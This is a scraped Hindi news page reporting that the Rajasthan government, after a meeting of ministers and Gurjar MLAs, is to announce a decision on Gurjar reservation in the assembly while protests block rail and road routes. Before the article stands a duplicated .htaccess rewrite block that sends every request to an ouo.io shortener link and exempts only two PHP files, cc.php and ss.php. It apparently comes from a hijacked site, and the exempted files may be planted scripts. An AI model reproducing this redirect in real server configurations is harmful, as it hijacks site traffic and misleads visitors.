
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 382
जयपुर - गहलोत सरकार गुर्जर आरक्षण को लेकर राजस्थान विधानसभा में बुधवार को बड़ा ऐलान करने जा रही है।
सीएमओ में मुख्यमंत्री अशोक गहलोत, विधानसभा अध्यक्ष डॉ. सीपी जोशी, डिप्टी सीएम सचिन पायलट, यूडीएच मंत्री शांति धारीवाल, चिकित्सा मंत्री रघु शर्मा, सामाजिक न्याय अधिकारिता मंत्री मास्टर भंवरलाल मेघवाल, राज्यमंत्री अशोक चांदना, पूर्व मंत्री डॉ. जितेंद्र सिंह, कांग्रेस विधायक शकुंतला रावत, जीआर खटाना समेत अन्य गुर्जर विधायकों की बैठक हुई।
इस बैठक के बाद पूर्व मंत्री डॉ. जितेंद्र सिंह ने बताया कि राज्य सरकार गुर्जरों के आरक्षण की मांग को लेकर गंभीर है। राज्य सरकार बुधवार को राजस्थान विधानसभा में गुर्जर आरक्षण को लेकर बड़ा फैसला लेगी। लेकिन क्या फैसला होगा, इसका ऐलान सदन के अंदर ही होगा। उन्होंने आंदोलनकारी गुर्जर समुदाय से अपील की है कि आंदोलन के दौरान शांति व्यवस्था बनाए रखे।
आपको बता दे कि गुर्जर आरक्षण आंदोलन को लेकर प्रदेश में टोंक, सवाईमाधोपुर, धौलपुर और अन्य गुर्जर बाहुल्यक्षेत्रों में रेल और सड़क मार्ग बाधित है।